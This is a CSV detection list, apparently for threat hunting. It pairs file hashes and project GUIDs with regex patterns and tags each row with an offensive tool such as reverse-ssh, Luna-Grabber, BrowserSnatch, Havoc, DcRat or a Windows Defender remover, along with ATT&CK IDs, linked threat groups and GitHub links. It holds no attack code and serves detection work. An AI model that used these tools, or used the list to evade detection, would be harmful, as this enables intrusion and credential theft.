"*f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46*",".{0,1000}f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43981"
"*f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6*",".{0,1000}f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","43985"
"*f4c91aebc3bbf867adc0ade2b4d82ffd1753a396143ce8e462b6460736efdbfd*",".{0,1000}f4c91aebc3bbf867adc0ade2b4d82ffd1753a396143ce8e462b6460736efdbfd.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","43986"
"*f4cd930bac7a9c0ab246d0eda53e0d7b541d3cb206687e52c5f9389c53aa5098*",".{0,1000}f4cd930bac7a9c0ab246d0eda53e0d7b541d3cb206687e52c5f9389c53aa5098.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","43988"
"*f4d042d26b74e99f7442cbd0b9e3587f512fc6367f5759d6451d28856526db15*",".{0,1000}f4d042d26b74e99f7442cbd0b9e3587f512fc6367f5759d6451d28856526db15.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","43989"
"*f4d29fdb47bdeb934a39cbc50f5ef589a10f08fe345b76711695f8d49ac1d627*",".{0,1000}f4d29fdb47bdeb934a39cbc50f5ef589a10f08fe345b76711695f8d49ac1d627.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43990"
"*f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219*",".{0,1000}f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43991"
"*f4e47eb7ffcf1a611807ade6cfb0ed331470a311c61b660cc5df5dfa2a254e35*",".{0,1000}f4e47eb7ffcf1a611807ade6cfb0ed331470a311c61b660cc5df5dfa2a254e35.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43992"
"*f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e*",".{0,1000}f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","43994"
"*f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290*",".{0,1000}f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","43995"
"*f4f0162579e4bc334ab0f4be1ac02fc7f459243e6b9427f68a9b18c38af48210*",".{0,1000}f4f0162579e4bc334ab0f4be1ac02fc7f459243e6b9427f68a9b18c38af48210.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43996"
"*f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a*",".{0,1000}f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43997"
"*f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9*",".{0,1000}f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","43999"
"*f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d*",".{0,1000}f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44001"
"*f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b*",".{0,1000}f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44002"
"*f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4*",".{0,1000}f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44004"
"*f515b31a54f823dfcef50ef4c3dbcc64e6062f5c5dc7f98b20b30c7cc0a5f3ff*",".{0,1000}f515b31a54f823dfcef50ef4c3dbcc64e6062f5c5dc7f98b20b30c7cc0a5f3ff.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44006"
"*f51cdf6aff5e752276cf11830733e4ac4b69526d4031ecaee4884f2c36576c4c*",".{0,1000}f51cdf6aff5e752276cf11830733e4ac4b69526d4031ecaee4884f2c36576c4c.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44007"
"*f520a23b9c1baf7a7a8ccf6f71e082f337a42e07d5437356d98bcb0eceec30af*",".{0,1000}f520a23b9c1baf7a7a8ccf6f71e082f337a42e07d5437356d98bcb0eceec30af.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44009"
"*f53acee57614581bb56dbb7af4a1de03128bbc7068bd312a5d7015eeeb48e263*",".{0,1000}f53acee57614581bb56dbb7af4a1de03128bbc7068bd312a5d7015eeeb48e263.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44015"
"*f53fce2c36ff530c68c813d8444a43f3167d32673727c447bd551ebebd9a5d80*",".{0,1000}f53fce2c36ff530c68c813d8444a43f3167d32673727c447bd551ebebd9a5d80.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44016"
"*f54554998f7c0981faa927601ff8a17b8ab48e6b8cef618df50c9f6d67c45e91*",".{0,1000}f54554998f7c0981faa927601ff8a17b8ab48e6b8cef618df50c9f6d67c45e91.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44017"
"*f54687027a34fa171337c495bbf41f5d099f580d38fb2404136b7ddd19be8dde*",".{0,1000}f54687027a34fa171337c495bbf41f5d099f580d38fb2404136b7ddd19be8dde.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44018"
"*f54c0294b0a07f49dc21ec7978c25cc5e75947646832675f1af782384aee911f*",".{0,1000}f54c0294b0a07f49dc21ec7978c25cc5e75947646832675f1af782384aee911f.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","44019"
"*f54d129e29fabcb7328aac406ea5a08ba38df3fa327a5ecddff0de316a95b5c9*",".{0,1000}f54d129e29fabcb7328aac406ea5a08ba38df3fa327a5ecddff0de316a95b5c9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44020"
"*f5523c0081af67436ef06a92aa48d12f865cea26232c074f6e8f74a52d2e9e7f*",".{0,1000}f5523c0081af67436ef06a92aa48d12f865cea26232c074f6e8f74a52d2e9e7f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44021"
"*f55346d51dc5695d97ddc5a060ca17f20f1cde41478b2c5e45a98c9549b4a383*",".{0,1000}f55346d51dc5695d97ddc5a060ca17f20f1cde41478b2c5e45a98c9549b4a383.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44022"
"*f55a88457981f18729ec39762c4118802327b8cb1230d29bc4ecf31eaf1af9b1*",".{0,1000}f55a88457981f18729ec39762c4118802327b8cb1230d29bc4ecf31eaf1af9b1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44024"
"*f55b17e5f63a4f87b16061fc2d44c366bd5868c30104ef273e783c087d2ef3cb*",".{0,1000}f55b17e5f63a4f87b16061fc2d44c366bd5868c30104ef273e783c087d2ef3cb.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","44025"
"*f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21*",".{0,1000}f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44027"
"*F56E4E1A-AB7A-4494-ACB9-8757164B0524*",".{0,1000}F56E4E1A\-AB7A\-4494\-ACB9\-8757164B0524.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","44028"
"*f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083*",".{0,1000}f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","44029"
"*f572574e8f466040330510743d57e07ac795ed8caa62856f3efd2bff4f69793d*",".{0,1000}f572574e8f466040330510743d57e07ac795ed8caa62856f3efd2bff4f69793d.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","44031"
"*f5776b57d23638d930bcadcfe6b2b2bbaad668472a74843a52d0a512093a05ed*",".{0,1000}f5776b57d23638d930bcadcfe6b2b2bbaad668472a74843a52d0a512093a05ed.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44032"
"*f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a*",".{0,1000}f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44033"
"*f57919481704f8a153d95054f5479c713c23246f633ea2ad2f52dde19ee51bc5*",".{0,1000}f57919481704f8a153d95054f5479c713c23246f633ea2ad2f52dde19ee51bc5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44034"
"*f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086*",".{0,1000}f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44036"
"*f57a182a690a6b7f1aa7cc9cfb880a3f252cddaab6aaeedaedf0f4883b4104b9*",".{0,1000}f57a182a690a6b7f1aa7cc9cfb880a3f252cddaab6aaeedaedf0f4883b4104b9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44037"
"*f585b5225e1165fbeea3219ed3ce74988c60801831d5b7b1b2cc0bec1e4e4793*",".{0,1000}f585b5225e1165fbeea3219ed3ce74988c60801831d5b7b1b2cc0bec1e4e4793.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#filehash","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","44038"
"*f58cbacfd41c4b0d5411a48f8142489dbde75c79211f37cb3c11a5063ebb6c2f*",".{0,1000}f58cbacfd41c4b0d5411a48f8142489dbde75c79211f37cb3c11a5063ebb6c2f.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","44039"
"*f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32*",".{0,1000}f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","44040"
"*f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529*",".{0,1000}f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44041"
"*f5986b6b5b1365e170643d4aa47939b15ea02a9d647e75a2a76bc7c0eb2de702*",".{0,1000}f5986b6b5b1365e170643d4aa47939b15ea02a9d647e75a2a76bc7c0eb2de702.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","44042"
"*f59b24c1d84e1bbb4c0dc2677bb4010b474eb36a62c54ed1fbbf04d05aaf6a22*",".{0,1000}f59b24c1d84e1bbb4c0dc2677bb4010b474eb36a62c54ed1fbbf04d05aaf6a22.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44043"
"*f59e403b62053c785de7df979c5cb7b0f426cbeb*",".{0,1000}f59e403b62053c785de7df979c5cb7b0f426cbeb.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","44044"
"*f5a0c01add702bb0f03e9e22d30242012cae3e5132a5de9d4888ecf987f3598f*",".{0,1000}f5a0c01add702bb0f03e9e22d30242012cae3e5132a5de9d4888ecf987f3598f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44045"
"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*",".{0,1000}f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#filehash","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","44046"
"*F5A53B43-5D6D-48EC-BC44-C0C1A0CEFA8D*",".{0,1000}F5A53B43\-5D6D\-48EC\-BC44\-C0C1A0CEFA8D.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","44047"
